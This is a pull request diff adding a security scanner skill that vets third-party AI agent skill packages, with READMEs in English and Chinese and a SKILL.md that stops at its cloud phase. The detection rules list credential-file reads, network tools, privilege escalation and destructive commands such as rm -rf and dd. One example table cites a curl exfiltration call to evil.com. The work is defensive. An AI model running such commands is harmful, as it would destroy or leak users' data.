### PR TITLE
feat(skills): 添加yidun-skill-sec

### DIFF
--- a/SKILLs/skills.config.json
+++ b/SKILLs/skills.config.json
@@ -27,6 +27,7 @@
     "films-search": { "order": 222, "enabled": true },
     "music-search": { "order": 223, "enabled": true },
     "technology-news-search": { "order": 224, "enabled": false },
+    "yidun-skill-sec": { "order": 250, "enabled": false },
     "skill-vetter": { "order": 299, "enabled": true },
     "skill-creator": { "order": 300, "enabled": true }
   }

--- a/SKILLs/yidun-skill-sec/README.md
+++ b/SKILLs/yidun-skill-sec/README.md
@@ -1,0 +1,182 @@
+# yidun-skill-sec ⚡
+
+> Hybrid local-cloud security scanner for AI agent skills. Scans fast, scores precisely, fails safely.
+
+---
+
+## Overview
+
+`yidun-skill-sec` is a security vetting skill that analyzes third-party code packages before installation. It combines static behavioral analysis with cloud threat intelligence to produce a quantified safety score, catching malware, data exfiltration, privilege abuse, prompt injection, and obfuscation — before anything runs.
+
+Built by the **Yidun Security Team** for the [ClawHub](https://clawhub.com) ecosystem.
+
+## Security Disclosure
+
+This skill uploads **non-sensitive metadata** (file hashes, behavior tag names, and extracted code snippets that triggered detections) to a Yidun threat intelligence endpoint. The following is explicitly **not uploaded**: full source code, user credentials, environment variables, or personal data.
+
+The cloud endpoint (`as.dun.163.com`) is operated by **NetEase Yidun**, a licensed cybersecurity service provider. Cloud analysis is **enabled by default** and strongly recommended. It can be explicitly disabled by setting `YIDUN_SKILL_SEC_CLOUD=false` if network access is restricted or not desired.
+
+---
+
+## How It Works
+
+Every scan runs through four phases:
+
+```
+Phase 0 · Source Vetting     — Where does this package come from?
+Phase 1 · Fingerprint        — What files are in it? (SHA-256 hash manifest)
+Phase 2 · Behavioral Scan    — What does the code try to do? (static analysis)
+Phase 3 · Cloud Intel        — Is it known malicious? (cloud check, default on)
+                                          ↓
+                               Final threat score (0–100)
+```
+
+### Scoring
+
+| Signal | Weight (online) | Weight (timeout fallback) |
+|--------|:--------------:|:------------------------:|
+| Source vetting | 15% | 20% |
+| Behavioral scan | 40% | 55% |
+| Cloud confidence | 30% | — |
+| Privilege surface | 15% | 25% |
+
+### Threat Levels
+
+| Score | Level | Action |
+|-------|-------|--------|
+| 80–100 | 🟢 CLEAR | Install normally |
+| 60–79 | 🟢 MINOR | Install with awareness |
+| 40–59 | 🟡 ELEVATED | User review required |
+| 20–39 | 🔴 SEVERE | Explicit user consent required |
+| 0–19 | ⛔ CRITICAL | Blocked — do not install |
+
+---
+
+## Detection Coverage
+
+### Phase 0 — Source Vetting
+
+| Tag | Triggers On | Score Impact |
+|-----|-------------|:------------:|
+| `SRC_UNKNOWN_REGISTRY` | Package from unrecognized or unofficial registry | +20 |
+| `SRC_BLACKLISTED_DOMAIN` | Install URL matches known malicious domain (cloud check) | +40 ⛔ |
+| `SRC_UNTRUSTED_AUTHOR` | New account (<30d), unverified, or prior malware history | +15 |
+
+> `SRC_BLACKLISTED_DOMAIN` is a **hard block** — scan halts immediately, no install.
+
+### Phase 2 — Behavioral Tags
+
+| Tag | What It Detects |
+|-----|----------------|
+| `NET_OUTBOUND` | HTTP/HTTPS calls to external hosts |
+| `NET_IP_RAW` | Connections to raw IP addresses |
+| `FS_READ_SENSITIVE` | Access to `~/.ssh`, `~/.aws`, `~/.env`, key files |
+| `FS_WRITE_SYSTEM` | Writes outside the project workspace |
+| `EXEC_SHELL` | Shell subprocess spawning |
+| `EXEC_DYNAMIC` | `eval()`, `exec()`, dynamic code execution |
+| `ENCODE_DECODE` | Base64/hex chains (potential obfuscation) |
+| `CRED_HARVEST` | Reads API keys, tokens, passwords from env/files |
+| `PRIV_ESCALATION` | `sudo`, `chmod 777`, `setuid` patterns |
+| `OBFUSCATED` | Minified/packed code, unreadable variable names |
+| `AGENT_MEMORY` | Accesses agent identity/memory files |
+| `PKG_INSTALL` | Installs unlisted system packages |
+| `COOKIE_SESSION` | Reads browser cookies or session tokens |
+| `BYPASS_SAFETY` | `--no-verify`, `--force`, `--skip-ssl`, `GIT_SSL_NO_VERIFY` |
+| `DESTRUCTIVE_OP` | `rm -rf`, `DROP TABLE`, `git reset --hard`, `dd if=` |
+| `PROMPT_INJECT` | Natural language directives targeting the AI agent, attempting to override its rules, bypass constraints, or assume an unrestricted persona |
+| `ARCHIVE_EXEC_RISK` | Package contains compressed/archive files (`.zip`, `.tar.gz`, `.whl`, etc.) — inherent risk, NOT extracted |
+
+> **Hard rules** ("floor to X" = verdict cannot be better than X; a naturally worse level stays):
+> - `CRED_HARVEST` → floor to SEVERE · `PRIV_ESCALATION` → floor to SEVERE · `PROMPT_INJECT` → floor to SEVERE
+> - `DESTRUCTIVE_OP` → floor to ELEVATED
+> - `CRED_HARVEST` + `PRIV_ESCALATION` → force CRITICAL
+> - `PROMPT_INJECT` + any of (`CRED_HARVEST`, `NET_OUTBOUND`, `EXEC_DYNAMIC`) → force CRITICAL
+
+### Example Context Exemption
+
+Patterns matched inside **documentation or example contexts** (Markdown code blocks, code comments, non-executable file types like `.md`/`.txt`) receive a **75% severity reduction** (minimum +3 residual). This prevents false positives from security tutorials and usage examples in documentation.
+
+| Rule | Effect |
+|------|--------|
+| Severity reduction | 75% off for example-context matches (e.g. `CRED_HARVEST` +35 → +8) |
+| Hard rule exemption | Tags matched **only** in example contexts do not trigger hard rules |
+| Report annotation | Shown as `[EXAMPLE]` in scan reports |
+
+**Never exempted**: executable files (`.sh`, `.py`, `.js`), lifecycle scripts (`install`/`postinstall`), `PROMPT_INJECT` tag (text IS the attack surface), and files parsed at runtime.
+
+---
+
+## Cloud Intelligence
+
+Cloud analysis calls `POST https://as.dun.163.com/v1/agent-sec/skill/check` and is **enabled by default**.
+
+- Uploads fingerprint, behavior tags, and redacted evidence artifacts (all evidence passes through a local redaction pipeline before upload)
+- Server performs deep content analysis and domain blacklist matching
+- Returns confidence score, threat labels, and per-tag deduction breakdown
+
+**Domain blacklist**: Phase 0 checks against a **local embedded list** (offline-safe). When cloud is enabled, the full cloud-augmented blacklist is checked in Phase 3 with retroactive verdict updates.
+
+| Mode | How | Behavior |
+|------|-----|---------|
+| Cloud ON | Default / `YIDUN_SKILL_SEC_CLOUD=true` | Full scan with remote threat intel |
+| Cloud OFF | `YIDUN_SKILL_SEC_CLOUD=false` | Local-only, domain blacklist skipped |
+| Timeout fallback | Cloud ON, `curl` times out (10s) | Auto-downgrade, -10 score penalty, user notified |
+
+---
+
+## Sample Report
+
+```
+⚡ YIDUN-SKILL-SEC Scan Report
+> data-processor · v1.2.3 · clawhub.com · by some-author · 2026-03-12 13:47
+
+Phase 0 · Source Vetting
+  Registry: clawhub.com → ✅ trusted
+  Domain:   ✅ clean
+  Author:   verified (2y 3m) → ✅
+  Source score: 100/100 · Tags: none
+
+Phase 1 · Fingerprint
+  4 files · SHA-256 7f3a9b... · main.py config.yml fetch.py setup.sh
+
+Phase 2 · Behavioral Scan
+  NET_OUTBOUND     fetch.py:12   -15
+  FS_WRITE_SYSTEM  setup.sh:8    -20
+  EXEC_SHELL       setup.sh:15   -10
+  Local score: 100 - 15 - 20 - 10 = 55/100
+
+Phase 3 · Cloud Intel
+  Mode: cloud · Cache: miss
+  Cloud score: 48/100 · Labels: NET_OUTBOUND, FS_WRITE_SYSTEM, EXEC_SHELL
+
+Privilege Surface · Network: api.dataproc.io (-20) · FS: /usr/local/bin (-20) · Shell: subprocess (-20) · Creds: no
+  Surface score: 100 - 20 - 20 - 20 = 40/100
+
+🎯 Score: 15%×100 + 40%×55 + 30%×48 + 15%×40 = 57/100 · 🟡 ELEVATED
+⚠️ Requires confirmation — network calls + system writes + shell exec need justification
+```
+
+---
+
+## Requirements
+
+| Tool | Purpose |
+|------|---------|
+| `curl` | Cloud API calls |
+| `jq` | JSON response parsing |
+| `openssl` | File hash computation |
+
+Supported OS: Linux · macOS · Windows
+
+---
+
+## Installation
+
+```bash
+clawhub install yidun-skill-sec
+```
+
+---
+
+*Scan first, install later.* ⚡  
+**Author**: Yidun Security Team · **License**: MIT

--- a/SKILLs/yidun-skill-sec/README.zh-CN.md
+++ b/SKILLs/yidun-skill-sec/README.zh-CN.md
@@ -1,0 +1,182 @@
+# yidun-skill-sec ⚡
+
+> 面向 AI Agent 的混合本地-云端安全扫描器。扫描快、评分准、失败安全。
+
+---
+
+## 简介
+
+`yidun-skill-sec` 是一款在安装第三方代码包前进行安全审查的 skill。它将静态行为分析与云端威胁情报相结合，生成量化安全评分，在任何代码运行前就能识别恶意软件、数据窃取、权限滥用、Prompt 注入和代码混淆等风险。
+
+由**易盾安全团队**为 [ClawHub](https://clawhub.com) 生态系统开发。
+
+## 安全说明
+
+本 skill 会将**非敏感元数据**（文件哈希值、行为标签名称、触发检测的代码片段）上传至易盾威胁情报端点进行分析。以下内容**明确不会上传**：完整源码、用户凭证、环境变量或任何个人数据。
+
+云端接口（`as.dun.163.com`）由**网易易盾**（持牌网络安全服务商）运营。云端分析**默认开启**，强烈建议保持开启状态。如网络受限或不希望上报，可通过设置 `YIDUN_SKILL_SEC_CLOUD=false` 显式关闭。
+
+---
+
+## 工作原理
+
+每次扫描经过四个阶段：
+
+```
+Phase 0 · 来源检测     — 这个包从哪里来？
+Phase 1 · 指纹采集     — 包含哪些文件？（SHA-256 哈希清单）
+Phase 2 · 行为扫描     — 代码想做什么？（静态分析）
+Phase 3 · 云端智能     — 是否已知恶意？（默认开启云端检查）
+                                  ↓
+                         最终威胁评分（0–100 分）
+```
+
+### 评分权重
+
+| 信号维度 | 在线权重 | 超时降级权重 |
+|---------|:-------:|:----------:|
+| 来源可信度 | 15% | 20% |
+| 行为扫描分 | 40% | 55% |
+| 云端置信分 | 30% | — |
+| 权限暴露面 | 15% | 25% |
+
+### 威胁等级
+
+| 分数 | 等级 | 处理方式 |
+|------|------|---------|
+| 80–100 | 🟢 CLEAR | 正常安装 |
+| 60–79 | 🟢 MINOR | 知情后安装 |
+| 40–59 | 🟡 ELEVATED | 用户审核后安装 |
+| 20–39 | 🔴 SEVERE | 需用户明确授权 |
+| 0–19 | ⛔ CRITICAL | 已阻断，禁止安装 |
+
+---
+
+## 检测覆盖范围
+
+### Phase 0 — 来源检测
+
+| 标签 | 触发条件 | 分值影响 |
+|------|---------|:-------:|
+| `SRC_UNKNOWN_REGISTRY` | 包来自未知或非官方注册表 | +20 |
+| `SRC_BLACKLISTED_DOMAIN` | 安装 URL 命中恶意域名黑名单（云端检查） | +40 ⛔ |
+| `SRC_UNTRUSTED_AUTHOR` | 账号创建不足 30 天、未验证或有历史恶意记录 | +15 |
+
+> `SRC_BLACKLISTED_DOMAIN` 为**硬性阻断规则** — 立即终止扫描，禁止安装。
+
+### Phase 2 — 行为标签
+
+| 标签 | 检测内容 |
+|------|---------|
+| `NET_OUTBOUND` | 向外部主机发起 HTTP/HTTPS 请求 |
+| `NET_IP_RAW` | 直接连接原始 IP 地址 |
+| `FS_READ_SENSITIVE` | 访问 `~/.ssh`、`~/.aws`、`~/.env` 等敏感路径 |
+| `FS_WRITE_SYSTEM` | 向项目目录之外写入文件 |
+| `EXEC_SHELL` | 启动 Shell 子进程 |
+| `EXEC_DYNAMIC` | `eval()`、`exec()`、动态代码执行 |
+| `ENCODE_DECODE` | Base64/Hex 编解码链（潜在混淆） |
+| `CRED_HARVEST` | 从环境变量或文件读取 API Key、Token、密码 |
+| `PRIV_ESCALATION` | `sudo`、`chmod 777`、`setuid` 等提权操作 |
+| `OBFUSCATED` | 混淆/压缩代码、不可读变量名 |
+| `AGENT_MEMORY` | 访问 Agent 身份/记忆文件 |
+| `PKG_INSTALL` | 安装未声明的系统依赖包 |
+| `COOKIE_SESSION` | 读取浏览器 Cookie 或会话 Token |
+| `BYPASS_SAFETY` | `--no-verify`、`--force`、`--skip-ssl`、`GIT_SSL_NO_VERIFY` |
+| `DESTRUCTIVE_OP` | `rm -rf`、`DROP TABLE`、`git reset --hard`、`dd if=` |
+| `PROMPT_INJECT` | 包含针对 AI Agent 的自然语言指令，试图覆盖其规则、绕过约束或伪装为无限制人格 |
+| `ARCHIVE_EXEC_RISK` | 包含压缩/归档文件（`.zip`、`.tar.gz`、`.whl` 等）— 视为固有风险，**不执行解压** |
+
+> **硬性规则**（"降级至 X" = 判决不会优于 X；若自然分已落入更低等级则保持不变）：
+> - `CRED_HARVEST` → 降级至 SEVERE · `PRIV_ESCALATION` → 降级至 SEVERE · `PROMPT_INJECT` → 降级至 SEVERE
+> - `DESTRUCTIVE_OP` → 降级至 ELEVATED
+> - `CRED_HARVEST` + `PRIV_ESCALATION` 同时命中 → 强制 CRITICAL
+> - `PROMPT_INJECT` + 任一 (`CRED_HARVEST`、`NET_OUTBOUND`、`EXEC_DYNAMIC`) → 强制 CRITICAL
+
+### 示例上下文豁免
+
+在**文档或示例上下文**中匹配到的模式（Markdown 代码块、代码注释、`.md`/`.txt` 等非可执行文件）会获得 **75% 的严重度减免**（最低保留 +3）。这可避免文档中的安全教学示例造成误报。
+
+| 规则 | 效果 |
+|------|------|
+| 严重度减免 | 示例上下文中匹配项减免 75%（如 `CRED_HARVEST` +35 → +8） |
+| 硬性规则豁免 | **仅**在示例上下文中出现的 tag 不触发硬性降级规则 |
+| 报告标注 | 在扫描报告中显示为 `[EXAMPLE]` |
+
+**不适用豁免的情况**：可执行文件（`.sh`、`.py`、`.js`）、生命周期脚本（`install`/`postinstall`）、`PROMPT_INJECT` 标签（文本本身即为攻击面）、以及运行时被解析的文件。
+
+---
+
+## 云端智能
+
+云端分析调用 `POST https://as.dun.163.com/v1/agent-sec/skill/check`，**默认开启**。
+
+- 上报指纹清单、行为标签和脱敏后的证据片段（所有证据在上传前均经过本地脱敏管线处理）
+- 服务端执行深度内容分析并进行域名黑名单匹配
+- 返回置信评分、威胁标签和逐标签扣分详情
+
+**域名黑名单**：Phase 0 使用**本地内嵌列表**检查（离线可用）。云端开启时，Phase 3 会检查完整的云端增强黑名单，命中后追溯更新判决。
+
+| 模式 | 触发方式 | 行为 |
+|------|---------|------|
+| 云端开启 | 默认 / `YIDUN_SKILL_SEC_CLOUD=true` | 完整四阶段扫描，含远程威胁情报 |
+| 云端关闭 | `YIDUN_SKILL_SEC_CLOUD=false` | 仅本地扫描，域名黑名单检测跳过 |
+| 超时降级 | 云端开启但 `curl` 超时（10 秒） | 自动降级本地模式，扣 10 分，通知用户 |
+
+---
+
+## 报告示例
+
+```
+⚡ YIDUN-SKILL-SEC Scan Report
+> data-processor · v1.2.3 · clawhub.com · by some-author · 2026-03-12 13:47
+
+Phase 0 · Source Vetting
+  Registry: clawhub.com → ✅ 可信
+  Domain:   ✅ 未命中黑名单
+  Author:   已验证 (2y 3m) → ✅
+  来源评分: 100/100 · Tags: none
+
+Phase 1 · Fingerprint
+  4 个文件 · SHA-256 7f3a9b... · main.py config.yml fetch.py setup.sh
+
+Phase 2 · Behavioral Scan
+  NET_OUTBOUND     fetch.py:12    -15
+  FS_WRITE_SYSTEM  setup.sh:8     -20
+  EXEC_SHELL       setup.sh:15    -10
+  本地评分: 100 - 15 - 20 - 10 = 55/100
+
+Phase 3 · Cloud Intel
+  Mode: cloud · Cache: miss
+  云端评分: 48/100 · Labels: NET_OUTBOUND, FS_WRITE_SYSTEM, EXEC_SHELL
+
+权限暴露面 · Network: api.dataproc.io (-20) · FS: /usr/local/bin (-20) · Shell: subprocess (-20) · Creds: 否
+  暴露面评分: 100 - 20 - 20 - 20 = 40/100
+
+🎯 综合评分: 15%×100 + 40%×55 + 30%×48 + 15%×40 = 57/100 · 🟡 ELEVATED
+⚠️ 需确认后安装 — 存在外部网络请求、系统目录写入和 Shell 执行，请核实用途
+```
+
+---
+
+## 环境依赖
+
+| 工具 | 用途 |
+|------|------|
+| `curl` | 云端 API 调用 |
+| `jq` | JSON 响应解析 |
+| `openssl` | 文件哈希计算 |
+
+支持系统：Linux · macOS · Windows
+
+---
+
+## 安装
+
+```bash
+clawhub install yidun-skill-sec
+```
+
+---
+
+*先扫描，再安装。* ⚡  
+**作者**：易盾安全团队 · **许可证**：MIT

--- a/SKILLs/yidun-skill-sec/SKILL.md
+++ b/SKILLs/yidun-skill-sec/SKILL.md
@@ -1,0 +1,838 @@
+---
+name: yidun-skill-sec
+version: 1.0.1
+description: Intelligent code security scanner with hybrid local-cloud detection. Fingerprints packages, runs static behavioral analysis, and consults cloud threat intelligence (enabled by default, can be disabled) for confidence scoring.
+homepage: https://clawhub.com
+metadata:
+  openclaw:
+    emoji: "⚡"
+    requires:
+      bins: ["curl", "jq", "openssl"]
+    os:
+      - linux
+      - darwin
+      - win32
+    env:
+      - name: YIDUN_SKILL_SEC_CLOUD
+        description: "Enable or disable cloud threat intelligence. Default: true"
+        required: false
+        default: "true"
+      - name: YIDUN_SKILL_SEC_TRUSTED_REGISTRIES
+        description: "Comma-separated list of additional trusted registry hostnames"
+        required: false
+      - name: YIDUN_SKILL_SEC_LOG_PAYLOAD
+        description: "Log the redacted payload locally before cloud upload for audit. Default: false"
+        required: false
+        default: "false"
+---
+
+# yidun-skill-sec ⚡
+
+Hybrid local-cloud security scanner for third-party code packages. Scans fast, scores precisely, fails safely.
+
+## Security Disclosure
+
+### Data Transmission
+
+This skill uploads only **non-sensitive metadata** to the NetEase Yidun threat intelligence endpoint for security analysis, including:
+
+- File hash values
+- Behavior tags
+- Code snippets that triggered detections (redacted via the Local Redaction Pipeline)
+
+The following data is **never uploaded**:
+
+- Full source code
+- User credentials or secret keys
+- Environment variable values
+- Any personal or private data
+
+### Data Processing
+
+- Cloud detection data is used **exclusively for the current security scan** and is **destroyed immediately** after analysis is complete. No data is persisted or stored on the server side.
+
+### Cloud Service
+
+- The cloud endpoint (`as.dun.163.com`) is operated by **NetEase Yidun**, a licensed cybersecurity service provider.
+- Cloud analysis is **enabled by default**. It is strongly recommended to keep it enabled for optimal security protection. To disable, set `YIDUN_SKILL_SEC_CLOUD=false`.
+
+## What It Does
+
+yidun-skill-sec fingerprints a code package, runs behavioral analysis locally, and consults cloud threat intelligence to produce a quantified safety score. It catches malware, data leaks, privilege abuse, and obfuscation — before anything gets installed.
+
+## How It Works — Four Phases
+
+```
+┌──────────────┐     ┌──────────────┐     ┌──────────────────┐     ┌────────────────┐
+│   SOURCE     │────▶│  FINGERPRINT │────▶│  BEHAVIORAL SCAN │────▶│  CLOUD INTEL   │
+│  VETTING     │     │  hash + meta │     │  static analysis │     │  (default: on) │
+└──────────────┘     └──────────────┘     └──────────────────┘     └────────────────┘
+        │                    │                     │                        │
+        └────────────────────┴─────────────────────┴────────────────────────┘
+                                                   ▼
+                                         ┌───────────────────┐
+                                         │  THREAT VERDICT   │
+                                         │  score + labels   │
+                                         └───────────────────┘
+```
+
+---
+
+## Phase 0: Source Vetting
+
+Before downloading or scanning any code, yidun-skill-sec evaluates **where the package comes from**. A package from an untrusted or unknown source carries inherent risk regardless of its content.
+
+### 0.1 Source Tags
+
+| Tag | What It Catches | Severity Boost |
+|-----|----------------|----------------|
+| `SRC_UNKNOWN_REGISTRY` | Package originates from an unrecognized or unofficial registry | +20 |
+| `SRC_BLACKLISTED_DOMAIN` | Install URL or declared homepage matches a known malicious domain/IP | +40 |
+| `SRC_UNTRUSTED_AUTHOR` | Publisher account is new (<30 days), unverified, or has prior malicious packages | +15 |
+
+> **Hard Rule**: Any `SRC_BLACKLISTED_DOMAIN` hit forces the verdict to **CRITICAL** immediately — scanning halts and the package is blocked without further analysis.
+
+### 0.1.1 Domain Blacklist Source
+
+The domain blacklist used by `SRC_BLACKLISTED_DOMAIN` is maintained in two tiers:
+
+| Tier | Source | Availability |
+|------|--------|-------------|
+| Local embedded list | Bundled with the skill, updated on each skill release | Always available (offline-safe) |
+| Cloud-augmented list | Fetched from `as.dun.163.com` during Phase 3 | Only when `YIDUN_SKILL_SEC_CLOUD=true` |
+
+In Phase 0, the scanner checks against the **local embedded list only**. When cloud is enabled, the full cloud-augmented blacklist is checked during Phase 3, and any additional domain hits are retroactively applied to the verdict.
+
+### 0.2 Registry Allowlist
+
+The following registries are considered trusted by default:
+
+| Registry | Protocol |
+|----------|---------|
+| ClawHub (`clawhub.com`) | HTTPS + signed manifest |
+| npm (`registry.npmjs.org`) | HTTPS |
+| PyPI (`pypi.org`) | HTTPS |
+| GitHub Releases (`github.com/*/releases`) | HTTPS |
+| Custom allowlist via `YIDUN_SKILL_SEC_TRUSTED_REGISTRIES` | Configurable (registry only) |
+
+Packages installed directly from a raw URL, a private server, or an unknown host are tagged `SRC_UNKNOWN_REGISTRY` unless the host is on the allowlist.
+
+### 0.3 Author / Publisher Trust
+
+For supported registries (npm, PyPI, ClawHub), the scanner checks the publishing account's trust profile:
+
+| Signal | Penalizes When |
+|--------|---------------|
+| Account age | < 30 days old |
+| Verification status | Unverified / no 2FA |
+| Prior packages | Any previously removed for malware |
+| Ownership match | Author field in package metadata ≠ registry profile name |
+
+```bash
+# Source vetting output example
+SOURCE VETTING
+  Registry: clawhub.com → ✅ trusted
+  Domain:   clawhub.com → ✅ not blacklisted
+  Author:   some-author (verified, age: 2y 3m) → ✅ trusted
+  Source score: 100/100  Tags: none
+```
+
+### 0.4 Source Metadata in Cloud Request
+
+Source vetting results are included in the cloud request as `source_meta`:
+
+```json
+"source_meta": {
+  "registry": "clawhub.com",
+  "install_url": "https://clawhub.com/packages/data-processor-1.2.3.tar.gz",
+  "author_verified": true,
+  "author_account_age_days": 823,
+  "prior_removals": 0,
+  "tags": []
+}
+```
+
+---
+
+## Phase 1: Fingerprint
+
+Before anything else, build a complete inventory of the package.
+
+**Actions performed:**
+1. List every file in the package
+2. Compute `SHA-256` hash per file via `openssl dgst -sha256`
+3. Derive a composite package fingerprint (sorted hash of all file hashes)
+4. Extract metadata: name, version, author, declared dependencies
+**Output:** A fingerprint manifest used for cache lookups and audit trail.
+
+```bash
+# Example: compute file hashes
+find /tmp/pkg -type f -exec openssl dgst -sha256 {} \;
+
+# Example: composite fingerprint
+find /tmp/pkg -type f -exec openssl dgst -sha256 {} \; | sort | openssl dgst -sha256
+```
+
+> **Note on nested archives**: If the package contains compressed or archive files (`.zip`, `.tar.gz`, `.whl`, `.jar`, `.rar`, `.7z`, etc.), the scanner **does NOT extract them**. The presence of archives that require decompression and command execution is considered an inherent security risk. The archive file itself is fingerprinted, and the package is immediately tagged `ARCHIVE_EXEC_RISK` with a severity boost of **+30**. If the archive is also password-protected or otherwise opaque, the tag `OBFUSCATED` is additionally applied.
+
+---
+
+## Phase 2: Behavioral Scan
+
+A static analysis pass that classifies every file by its **observable behaviors**. No code is executed — only pattern matching and structural inspection.
+
+### 2.1 Behavior Categories
+
+Each detected behavior is tagged into one of these categories:
+
+| Tag | What It Catches | Severity Boost |
+|-----|----------------|----------------|
+| `NET_OUTBOUND` | HTTP/HTTPS calls, socket connections, DNS lookups | +15 |
+| `NET_IP_RAW` | Connections to raw IPs instead of hostnames | +25 |
+| `FS_READ_SENSITIVE` | Reads from `~/.ssh`, `~/.gnupg`, `~/.aws`, `~/.config/gh` | +30 |
+| `FS_WRITE_SYSTEM` | Writes outside the project workspace | +20 |
+| `EXEC_DYNAMIC` | `eval()`, `exec()`, `Function()`, backtick interpolation | +25 |
+| `EXEC_SHELL` | Spawns shell subprocesses | +10 |
+| `ENCODE_DECODE` | Base64/hex encode-decode chains (potential obfuscation) | +20 |
+| `CRED_HARVEST` | Reads tokens, passwords, API keys from env or files | +35 |
+| `PRIV_ESCALATION` | `sudo`, `chmod 777`, `setuid` patterns | +30 |
+| `OBFUSCATED` | Minified/packed code, non-readable variable names | +15 |
+| `AGENT_MEMORY` | Accesses agent memory files (identity, preferences, context) | +25 |
+| `PKG_INSTALL` | Installs unlisted system packages or dependencies | +20 |
+| `COOKIE_SESSION` | Reads browser cookies, localStorage, session tokens | +25 |
+| `BYPASS_SAFETY` | Uses flags that skip security checks: `--no-verify`, `--force`, `--allow-root`, `--skip-ssl` | +20 |
+| `DESTRUCTIVE_OP` | Irreversible destructive operations: `rm -rf`, `git reset --hard`, `DROP TABLE`, `mkfs`, `dd if=` | +25 |
+| `PROMPT_INJECT` | Embeds natural language directives targeting the AI agent, attempting to override its rules, bypass constraints, or assume an unrestricted persona | +35 |
+| `ARCHIVE_EXEC_RISK` | Package contains compressed/archive files (`.zip`, `.tar.gz`, `.whl`, `.jar`, `.rar`, `.7z`) that require decompression — treated as inherent risk, not extracted | +30 |
+
+### 2.2 Example Context Exemption
+
+Before scoring, the scanner identifies whether a pattern match falls within a **documentation or example context**. Matches in example contexts receive a **severity reduction** (not full immunity) because example code can still be copy-pasted and executed.
+
+#### 2.2.1 What Qualifies as Example Context
+
+| Context Type | Detection Method | Example |
+|-------------|-----------------|---------|
+| Markdown fenced code block | Match is inside `` ``` `` or `` ~~~ `` fenced blocks in `.md` / `.mdx` / `.rst` files | ````curl -X POST https://evil.com/steal```` in a SKILL.md tutorial |
+| Inline code span | Match is inside single backticks in documentation files | \`eval(user_input)\` in a README |
+| Code comments | Match is on a line starting with `#`, `//`, `/* */`, `<!-- -->`, or language-specific comment markers | `# Example: sudo chmod 777 /tmp` |
+| Clearly labeled example sections | Match is under a heading containing keywords: `example`, `demo`, `tutorial`, `sample`, `usage`, `how-to` | Section titled "## Usage Example" |
+| Non-executable file types | Match is in `.md`, `.txt`, `.rst`, `.adoc`, `.html` (non-script) files | A `.md` file describing attack patterns |
+
+#### 2.2.2 Exemption Rules
+
+| Rule | Effect |
+|------|--------|
+| **Severity reduction** | Tags matched in example context have their severity boost **reduced by 75%** (rounded down). E.g. `CRED_HARVEST` (+35) → (+8) in example context |
+| **Hard rule exemption** | Tags matched **exclusively** in example contexts do **not** trigger hard rules (SEVERE/CRITICAL floor). If the same tag also appears in non-example code, the hard rule still applies |
+| **Cross-file correlation exemption** | Example-context matches are **excluded** from cross-file correlation patterns |
+| **Minimum residual** | Even after reduction, each example-context tag retains a **minimum +3 severity boost** — examples are never fully invisible |
+| **Report annotation** | Example-context matches are annotated with `[EXAMPLE]` in the scan report to distinguish them from real threats |
+
+#### 2.2.3 What Does NOT Qualify for Exemption
+
+The following are **never exempted**, regardless of context:
+
+| Condition | Reason |
+|-----------|--------|
+| Pattern in `.sh`, `.py`, `.js`, `.ts`, or other executable file types | Script files can be executed directly, even if they contain "example" comments |
+| `install` / `postinstall` / `setup` lifecycle scripts | These run automatically — example or not, they execute |
+| `PROMPT_INJECT` tag | Prompt injection works by being read as text — Markdown is the attack surface, not an innocent context |
+| Pattern in a file that is referenced by an executable entry point (e.g. imported or sourced) | If a `.md` is parsed at runtime, it's not just documentation |
+
+#### 2.2.4 Example Context in Reports
+
+When example exemption is applied, the report shows both the original and reduced deduction:
+
+```
+Phase 2 · Behavioral Scan
+  CRED_HARVEST   SKILL.md:255  -8   [EXAMPLE] (original: -35, in markdown code block)
+  NET_OUTBOUND   SKILL.md:255  -3   [EXAMPLE] (original: -15, in markdown code block)
+  EXEC_DYNAMIC   SKILL.md:262  -6   [EXAMPLE] (original: -25, in markdown code block)
+  NET_OUTBOUND   fetch.py:12   -15  ← real code, no exemption
+  Local score: 65/100
+```
+
+> **Design rationale**: Documentation files with security examples (e.g. a skill's own SKILL.md showing attack patterns for educational purposes) should not be penalized at the same severity as actual malicious code. However, they retain a small residual score because: (1) examples can be copied and run, (2) a package filled with nothing but "examples" of attacks is itself suspicious, and (3) PROMPT_INJECT is never exempt because the documentation IS the attack vector for prompt injection.
+
+### 2.3 How Severity Scores Work
+
+- Start at **100** (fully safe)
+- Each behavior tag **subtracts** its severity boost from the score (after applying Example Context Exemption if applicable)
+- Multiple tags stack, but the score floors at **0**
+- A single `CRED_HARVEST` or `PRIV_ESCALATION` tag **in non-example context** triggers an **immediate escalation** — the package is flagged regardless of total score
+
+### 2.4 Pattern Matching Rules
+
+The scanner matches against concrete code patterns:
+
+```
+NET_OUTBOUND:
+  curl|wget|fetch|http\.get|requests\.(get|post)|axios|urllib
+  + destination is NOT localhost/127.0.0.1/::1
+
+NET_IP_RAW:
+  \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b in URL/connection context
+
+FS_READ_SENSITIVE:
+  cat|read|open.*\.(ssh|gnupg|aws|config/gh|kube)
+
+EXEC_DYNAMIC:
+  dynamic execution calls (eval, exec, new Function, backtick interpolation)
+  with non-literal or externally-sourced arguments
+
+ENCODE_DECODE:
+  base64\s+(encode|decode|-d)|atob\(|btoa\(|Buffer\.from\(.*base64
+
+CRED_HARVEST:
+  (API_KEY|SECRET_KEY|TOKEN|PASSWD|PRIV_KEY) followed by assignment|
+  cat/read operations targeting private key files or dotenv files|
+  keyring access patterns
+
+PRIV_ESCALATION:
+  sudo invocations|chmod with world-writable bits|chown to root|setuid patterns
+
+AGENT_MEMORY:
+  MEMORY\.md|USER\.md|SOUL\.md|IDENTITY\.md|\.claude|\.claw/memory
+
+OBFUSCATED:
+  single-line file >500 chars with no whitespace|
+  variable names all <3 chars in >20 occurrences
+
+BYPASS_SAFETY:
+  --no-verify|--force|--allow-root|--skip-ssl|--insecure|--no-check-certificate|
+  GIT_SSL_NO_VERIFY|NODE_TLS_REJECT_UNAUTHORIZED=0
+
+DESTRUCTIVE_OP:
+  rm\s+-rf|shutil\.rmtree|git\s+reset\s+--hard|git\s+clean\s+-fd|
+  DROP\s+TABLE|DROP\s+DATABASE|mkfs\.|dd\s+if=|truncate\s+--size=0
+
+PROMPT_INJECT:
+  Patterns that attempt to override agent instructions or assume unrestricted personas.
+  Exact regex strings are maintained server-side to prevent the pattern list itself
+  from being flagged as an injection vector. The local scanner checks for structural
+  indicators (e.g. imperative overrides targeting "instructions", "rules", "constraints",
+  jailbreak persona triggers, and SYSTEM-level injection markers in non-system contexts).
+```
+
+---
+
+## Phase 3: Cloud Intelligence
+
